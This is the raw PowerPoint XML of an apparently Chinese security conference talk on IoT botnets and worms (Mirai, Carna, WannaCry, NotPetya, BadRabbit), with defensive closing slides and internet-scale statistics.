          <p:cNvPr id="431" name="无论你喊什么词，态势感知也好，威胁情报也罢，这些对我们来说都无关紧要，我们在乎实际解决问题，那么对抗的第一步就是：及时看见。"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="14"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1270000" y="3416299"/>
            <a:ext cx="10464800" cy="2120901"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:t>无论你喊什么词，态势感知也好，威胁情报也罢，这些对我们来说都无关紧要，我们在乎实际解决问题，那么对抗的第一步就是：及时看见。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我们的希望"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1270000" y="5689600"/>
            <a:ext cx="10464800" cy="609600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:t>我们的希望</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="434" name="我们希望通过我们的努力，可以给这个网络空间带来一些和平"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="14"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1270000" y="3752850"/>
            <a:ext cx="10464800" cy="1447801"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:t>我们希望通过我们的努力，可以给这个网络空间带来一些和平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Q&amp;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Q&amp;A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IPv4空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IPv4空间</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="144" name="希尔伯特曲线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t>希尔伯特曲线</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="145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52092" y="3551434"/>
            <a:ext cx="4652791" cy="4657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9917" y="4159553"/>
            <a:ext cx="3441094" cy="3441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icture 2" descr="Picture 2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24071" y="4007618"/>
            <a:ext cx="3744961" cy="3744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全球网络空间基础参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全球网络空间基础参数</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="150" name="当前能被识别到主流组件的IP总量不超过2亿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当前能被识别到主流组件的IP总量不超过2亿</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:t>全球顶级域名：271,110,899 ~= 2.7亿</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:t>组件漏洞总量：CVE(92441)/Nessus(80000)/EDB(38147) ~= 10万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自定义</PresentationFormat>
  <Slides>75</Slides>
  <Notes>0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76" baseType="lpstr">
      <vt:lpstr>Showroom</vt:lpstr>
      <vt:lpstr>全球地下黑客的帝国 网络空间IoT战场</vt:lpstr>
      <vt:lpstr>关于我</vt:lpstr>
      <vt:lpstr>EEEE</vt:lpstr>
      <vt:lpstr>现在在做的事</vt:lpstr>
      <vt:lpstr>分享内容</vt:lpstr>
      <vt:lpstr>一些背景</vt:lpstr>
      <vt:lpstr>全球网络空间基础参数</vt:lpstr>
      <vt:lpstr>IPv4空间</vt:lpstr>
      <vt:lpstr>全球网络空间基础参数</vt:lpstr>
      <vt:lpstr>基础参数 + 人类活动 = ？</vt:lpstr>
      <vt:lpstr>答案</vt:lpstr>
      <vt:lpstr>几个案例</vt:lpstr>
      <vt:lpstr>D-Link网络摄像头全球监控</vt:lpstr>
      <vt:lpstr>百万级僵尸网络</vt:lpstr>
      <vt:lpstr>百万级僵尸网络</vt:lpstr>
      <vt:lpstr>百万级僵尸网络</vt:lpstr>
      <vt:lpstr>思考</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>工控经典架构</vt:lpstr>
      <vt:lpstr>西门子PLC工控网络的沦陷</vt:lpstr>
      <vt:lpstr>思考</vt:lpstr>
      <vt:lpstr>蠕虫进化</vt:lpstr>
      <vt:lpstr>攻击模型</vt:lpstr>
      <vt:lpstr>几个案例</vt:lpstr>
      <vt:lpstr>拥有鼻祖身份的 Carna Botnet</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>剖析</vt:lpstr>
      <vt:lpstr>架构</vt:lpstr>
      <vt:lpstr>Bot行为</vt:lpstr>
      <vt:lpstr>C&amp;C</vt:lpstr>
      <vt:lpstr>扫描方法</vt:lpstr>
      <vt:lpstr>植入情况</vt:lpstr>
      <vt:lpstr>部署挑战</vt:lpstr>
      <vt:lpstr>任务</vt:lpstr>
      <vt:lpstr>展示</vt:lpstr>
      <vt:lpstr>统计</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>全球完美收割的 WannaCry</vt:lpstr>
      <vt:lpstr>经典画面</vt:lpstr>
      <vt:lpstr>惊世骇俗</vt:lpstr>
      <vt:lpstr>插曲</vt:lpstr>
      <vt:lpstr>比特币钱包</vt:lpstr>
      <vt:lpstr>一种态势</vt:lpstr>
      <vt:lpstr>勒索加密细节</vt:lpstr>
      <vt:lpstr>携带内网渗透技巧的 NotPetya</vt:lpstr>
      <vt:lpstr>经典画面</vt:lpstr>
      <vt:lpstr>特点</vt:lpstr>
      <vt:lpstr>Mimikatz</vt:lpstr>
      <vt:lpstr>PsExec</vt:lpstr>
      <vt:lpstr>WMIC</vt:lpstr>
      <vt:lpstr>其他特点</vt:lpstr>
      <vt:lpstr>几个关键点</vt:lpstr>
      <vt:lpstr>猥琐钓鱼植入的 BadRabbit</vt:lpstr>
      <vt:lpstr>经典画面</vt:lpstr>
      <vt:lpstr>特点</vt:lpstr>
      <vt:lpstr>钓鱼</vt:lpstr>
      <vt:lpstr>直接看这张图</vt:lpstr>
      <vt:lpstr>下一步如何进化</vt:lpstr>
      <vt:lpstr>进化</vt:lpstr>
      <vt:lpstr>对抗思路</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>MOOZ架构</vt:lpstr>
      <vt:lpstr>MIrai的进化</vt:lpstr>
      <vt:lpstr>如针对AVTECH的</vt:lpstr>
      <vt:lpstr>IoT漏洞研究</vt:lpstr>
      <vt:lpstr>IoT漏洞研究</vt:lpstr>
      <vt:lpstr>深度剖析了解目标蠕虫</vt:lpstr>
      <vt:lpstr>良性蠕虫</vt:lpstr>
      <vt:lpstr>Hajime</vt:lpstr>
      <vt:lpstr>一个有趣的点</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿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全球地下黑客的帝国 网络空间IoT战场</dc:title>
  <cp:revision>1</cp:revision>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2019-05-14T04:46:17Z</dcterms:modified>
</cp:coreProperties>
</file>